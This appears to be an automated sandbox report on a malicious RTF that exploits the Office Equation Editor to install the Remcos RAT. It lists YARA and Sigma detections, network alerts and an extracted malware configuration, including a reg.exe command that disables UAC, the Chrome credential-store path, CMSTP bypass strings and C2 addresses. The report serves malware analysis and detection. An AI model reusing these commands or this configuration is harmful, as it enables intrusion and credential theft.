6.2.name.exe.d70000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
6.2.name.exe.d70000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
7.2.svchost.exe.400000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.svchost.exe.400000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.svchost.exe.400000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
7.2.svchost.exe.400000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
7.2.svchost.exe.400000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
7.2.svchost.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
13.2.name.exe.28e0000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
13.2.name.exe.28e0000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.name.exe.28e0000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.name.exe.28e0000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
13.2.name.exe.28e0000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
13.2.name.exe.28e0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
7.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
7.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
7.2.svchost.exe.400000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
7.2.svchost.exe.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
13.2.name.exe.28e0000.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
13.2.name.exe.28e0000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.name.exe.28e0000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.name.exe.28e0000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
13.2.name.exe.28e0000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
13.2.name.exe.28e0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
Click to see the 43 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 104.168.7.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3384, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3384, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3384, Protocol: tcp, SourceIp: 104.168.7.25, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\taskhostw.exe, NewProcessName: C:\Users\user\AppData\Roaming\taskhostw.exe, OriginalFileName: C:\Users\user\AppData\Roaming\taskhostw.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3384, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3540, ProcessName: taskhostw.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\taskhostw.exe, NewProcessName: C:\Users\user\AppData\Roaming\taskhostw.exe, OriginalFileName: C:\Users\user\AppData\Roaming\taskhostw.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3384, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3540, ProcessName: taskhostw.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 3820, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3580, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3592, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 3820, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3384, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3304, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3580, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3592, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 24 02 9C 59 2D EF 50 20 D1 91 9D B5 93 7A 2E 6D 2C 2A DE 2B AF 5F 79 2B F0 1D 9F 3C F0 B1 E8 C5 7E 3D 5C E5 B2 02 16 9E 1A D7 18 B5 58 68 E1 4C 11 21 7B DD 04 AF D5 D5 CD 62 44 E0 DF 63 AC 0D , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3592, TargetObject: HKEY_CURRENT_USER\Software\Rmc-FI789R\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T07:29:04.453432+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.22	49162	107.173.4.16	2404	TCP
2024-10-13T07:29:05.555031+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.22	49164	107.173.4.16	2404	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T07:28:59.168544+0200	2022050	1	A Network Trojan was detected	104.168.7.25	80	192.168.2.22	49161	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T07:28:59.282925+0200	2022051	1	A Network Trojan was detected	104.168.7.25	80	192.168.2.22	49161	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T07:29:05.537882+0200	2803304	3	Unknown Traffic	192.168.2.22	49163	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: WC5Gv13cOQ.rtf

Avira: detected

Found malware configuration

Source: 14.2.svchost.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Version": "5.1.3 Pro", "Host:Port:Password": "107.173.4.16:2404", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\directory\name.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: WC5Gv13cOQ.rtf	ReversingLabs: Detection: 52%
Source: WC5Gv13cOQ.rtf	Virustotal: Detection: 50%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe	Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

7_2_004338C8

Source: name.exe, 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_27fe3722-c

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.168.7.25 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00407538 _wcslen,CoGetObject,

7_2_00407538

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: name.exe, 00000006.00000003.364862213.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.364383190.0000000001150000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394321762.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394032155.00000000029C0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5449B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00D5449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_00D5C7E8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5C75D FindFirstFileW,FindClose,	5_2_00D5C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00D5F021
